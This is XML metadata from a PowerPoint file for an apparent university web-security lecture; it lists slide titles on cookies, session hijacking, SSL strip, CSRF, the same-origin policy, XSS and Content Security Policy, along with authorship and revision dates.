      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>3_Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Previously</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Maintaining State</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Online ordering (hidden field example)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Ex: Online ordering</vt:lpstr>
      <vt:lpstr>Ex: Online ordering</vt:lpstr>
      <vt:lpstr>Solution: Capabilities</vt:lpstr>
      <vt:lpstr>Using capabilities</vt:lpstr>
      <vt:lpstr>Using capabilities</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Statefulness with Cookies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cookies are key-value pairs</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Set a cookie domain</vt:lpstr>
      <vt:lpstr>Set a cookie path</vt:lpstr>
      <vt:lpstr>Secure Cookies</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies</vt:lpstr>
      <vt:lpstr>Why use cookies?</vt:lpstr>
      <vt:lpstr>Why use cookies?</vt:lpstr>
      <vt:lpstr>Third party cookies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cookie theft</vt:lpstr>
      <vt:lpstr>If you want to steal a cookie</vt:lpstr>
      <vt:lpstr>Mitigating Hijack</vt:lpstr>
      <vt:lpstr>SSL Strip (1)</vt:lpstr>
      <vt:lpstr>SSL Strip (2)</vt:lpstr>
      <vt:lpstr>How can users be aware of this attack?</vt:lpstr>
      <vt:lpstr>Defense: Unpredictability</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>URLs with side effects</vt:lpstr>
      <vt:lpstr>Exploiting URLs with side-effects</vt:lpstr>
      <vt:lpstr>Exploiting URLs with side-effects</vt:lpstr>
      <vt:lpstr>Exploiting URLs with side-effects</vt:lpstr>
      <vt:lpstr>Exploiting URLs with side-effects</vt:lpstr>
      <vt:lpstr>Exploiting URLs with side-effects</vt:lpstr>
      <vt:lpstr>Exploiting URLs with side-effects</vt:lpstr>
      <vt:lpstr>Exploiting URLs with side-effects</vt:lpstr>
      <vt:lpstr>Exploiting URLs with side-effects</vt:lpstr>
      <vt:lpstr>Exploiting URLs with side-effects</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Another example</vt:lpstr>
      <vt:lpstr>Defense: Referer validation</vt:lpstr>
      <vt:lpstr>I visit reddit.com</vt:lpstr>
      <vt:lpstr>Lenient policy is insecure</vt:lpstr>
      <vt:lpstr>Defense: Secret token</vt:lpstr>
      <vt:lpstr>Defense: Secret token</vt:lpstr>
      <vt:lpstr>Defense: Secret token</vt:lpstr>
      <vt:lpstr>Defense: Secret token</vt:lpstr>
      <vt:lpstr>Double Submit Cookie</vt:lpstr>
      <vt:lpstr>Same-Site Cookie Attribute to Prevent CSRF Attacks</vt:lpstr>
      <vt:lpstr>Same-Site Cookie Attribute to Prevent CSRF Attacks</vt:lpstr>
      <vt:lpstr>Same-Site Cookie Attribute to Prevent CSRF Attacks</vt:lpstr>
      <vt:lpstr>Same-Site Cookie Attribute to Prevent CSRF Attacks</vt:lpstr>
      <vt:lpstr>Same-Site Cookie Attribute to Prevent CSRF Attacks</vt:lpstr>
      <vt:lpstr>Same-Site Cookie Attribute to Prevent CSRF Attacks</vt:lpstr>
      <vt:lpstr>Same-Site Cookie Attribute to Prevent CSRF Attacks</vt:lpstr>
      <vt:lpstr>Same-Site Cookie Attribute to Prevent CSRF Attacks</vt:lpstr>
      <vt:lpstr>Same-Site Cookie Attribute to Prevent CSRF Attacks</vt:lpstr>
      <vt:lpstr>Is Same-Site enough or CSRF tokens are still needed?</vt:lpstr>
      <vt:lpstr>Not  All  About Cookies</vt:lpstr>
      <vt:lpstr>Home Router Example</vt:lpstr>
      <vt:lpstr>CSRF Summary</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Modern Website</vt:lpstr>
      <vt:lpstr>Modern Website</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Modern Website</vt:lpstr>
      <vt:lpstr>Modern Website</vt:lpstr>
      <vt:lpstr>Modern Website</vt:lpstr>
      <vt:lpstr>Modern Website</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Rather than static or dynamic HTML, web pages  can be a program written in Javascript:</vt:lpstr>
      <vt:lpstr>no relation  to Java</vt:lpstr>
      <vt:lpstr>What could go wrong?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cookies and SOP</vt:lpstr>
      <vt:lpstr>What is an Origin?</vt:lpstr>
      <vt:lpstr>Frame Isolation</vt:lpstr>
      <vt:lpstr>SOP: Frames</vt:lpstr>
      <vt:lpstr>What’s Isolated? (Objects)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS: Subverting the SOP</vt:lpstr>
      <vt:lpstr>Two types of XSS</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS Summary</vt:lpstr>
      <vt:lpstr>Your friend and mine, Samy</vt:lpstr>
      <vt:lpstr>Two types of XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reflected Example</vt:lpstr>
      <vt:lpstr>Echoed input</vt:lpstr>
      <vt:lpstr>Echoed input</vt:lpstr>
      <vt:lpstr>Echoed input</vt:lpstr>
      <vt:lpstr>Exploiting echoed input</vt:lpstr>
      <vt:lpstr>Exploiting echoed input</vt:lpstr>
      <vt:lpstr>Exploiting echoed input</vt:lpstr>
      <vt:lpstr>Reflected XSS Summary</vt:lpstr>
      <vt:lpstr>XSS Defense: Filter/Escape</vt:lpstr>
      <vt:lpstr>Did you find everything?</vt:lpstr>
      <vt:lpstr>Filtering is Really Hard</vt:lpstr>
      <vt:lpstr>Content Security Policy</vt:lpstr>
      <vt:lpstr>Example CSP 1</vt:lpstr>
      <vt:lpstr>Example CSP 2</vt:lpstr>
      <vt:lpstr>Content Security Policy</vt:lpstr>
      <vt:lpstr>XSS vs. CSRF</vt:lpstr>
      <vt:lpstr>Input validation, ad infinitum</vt:lpstr>
      <vt:lpstr>Takeaways: Verify before trust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Asim</dc:creator>
  <cp:lastModifiedBy>Zainab Abaid</cp:lastModifiedBy>
  <cp:revision>167</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-01T09:07:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-11T06:22:32Z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2017-02-01T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>